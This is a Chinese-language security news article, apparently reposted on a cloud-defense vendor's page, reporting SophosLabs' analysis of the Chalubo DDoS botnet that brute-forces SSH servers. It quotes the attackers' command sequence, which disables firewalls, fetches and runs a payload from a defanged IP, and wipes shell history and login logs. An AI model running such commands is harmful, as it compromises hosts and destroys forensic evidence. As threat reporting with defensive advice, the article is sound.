热门搜索词

热门文章

  • [公告]4月19日天津电信机房割接通知

    接天津电信通知,将于北京时间2024-4-19 02:00至2024-4-19 06:00对天津电信机房进行割接维护,涉及 IP段42.81.219.0/25 、240e:928:501:9::/96。

  • [公告]4月25日知道创宇云防御节点更新...

    为提供更好更优质的云防御服务,我们将于近期对机房节点进行优化和调整,部分节点IP将不再提供服务,涉及IPv4网段:111.47.226.0/24、118.212.233.0/24、117.23.61.0/24、116.211.155.0/24,IPv6网段:2409:8C4D:5200:000C::/64、240E:0954:0000:0010::/64、240E:095C:2003:0008::/64、2408:874C::/60。

  • [公告]4月12日株洲联通机房割接通知

    接湖南联通通知,将于北京时间2024-04-12 00:00至2024-04-12 04:00对株洲联通机房进行割接维护,涉及 IP段 119.39.205.0/25、2408:8752:100:4:0:1::/96。

关注知道创宇云防御

获取最新安全动态

最新Chalubo僵尸网络来袭,目标指向服务器和物联网设备

来源:黑客视界 2018.10.25

网络安全公司Sophos旗下SophosLabs在本周一(10月22日)发表的一篇博文中指出,他们近两个月一直在持续关注一场开始于9月初的网络攻击活动,目标是开启了SSH服务器的Linux服务器。而在这场攻击活动中,攻击者的主要目的在于传播一种被他们称之为“Chalubo”的最新自动化DDos攻击工具。

SophosLabs的分析表明,攻击者使用了ChaCha流密码来加密Chalubo的主组件以及相应的Lua脚本,而在最新的版本中,攻击者已经采用了更常见的Windows恶意软件原理来阻止对Chalubo的检测。不变的是,最新版本的Chalubo同样整合了来自Xor.DDoS和Mirai恶意软件家族的代码。

在8月下旬开始传播,目前已有多个版本

根据SophosLabs的说法,Chalubo于8月下旬开始通过网络感染目标设备,攻击者随后会通过在受感染设备上发出命令来检索它。Chalubo实际上由三部分组成:下载模块(downloader)、主bot程序(最初仅能够在具有x86处理器架构的系统上运行)和Lua命令脚本。

到了10月中旬,攻击者开始发出检索Elknot dropper(检测为Linux/DDoS-AZ)的命令,它被用于提供Chalubo(ChaCha-Lua-bot)软件包的其余部分。

此外,目前已经出现了能够在不同处理器架构上运行的各种bot程序版本,包括32位和64位的ARM、x86、x86_64、MIPS、MIPSEL和PowerPC。这可能表明,这场网络攻击活动的测试阶段已经结束,或许我们之后会看到基于Chalubo攻击活动数量的持续上升。

尝试暴力破解密码,强制登录SSH服务器

SophosLabs表示,由他们部署的蜜罐系统最初在2018年9月6日记录了相关攻击。Chalubo的bot程序首先会尝试暴力破解密码,以强制登录SSH服务器。

一旦攻击者获得了对目标设备的访问权限,他们就会发出以下命令:

/etc/init.d/iptables stop

service iptables stop

SuSEfirewall2 stop

reSuSEfirewall2 stop

chattr -i /usr/bin/wget

chmod 755 /usr/bin/wget

yum install -y wget

wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/

chmod 777 /usr/bin/libsdes

nohup /usr/bin/libsdes > /dev/null 2>&1 &

export HISTFILE=/dev/null

rm -f /var/log/wtmp

history -c

虽然攻击手法十分常见,但攻击者使用了分层方法来下载恶意组件,并且使用的加密方法对于Linux恶意软件而言,也是我们所不常见的。

事实上,如果仔细查看负责持续攻击的代码段的话,我们能够发现Chalubo已经从Xor.DDoS恶意软件家族中复制了DelService和AddService函数。另外,一些代码段复制于Mirai恶意软件,如一些随机函数和util_local_addr函数的扩展代码。

SophosLabs提出的一些预防建议和防范措施

由于Chalubo感染目标系统的主要方法是通过对使用通用的用户名和密码组合对SSH服务器的登录凭证进行暴力破解,因此SophosLabs建议SSH服务器的系统管理员(包括嵌入式设备)应更改这些设备上的默认密码。如果可能的话,系统管理员最好使用SSH密钥,而不是登录密码。

此外,与其他任何设备一样,保持系统更新、及时安装官方发布的修复补丁,以及安装实用的防病毒软件都会是很好的主动防御措施。

售前支持

400-161-0866

联系企业微信客服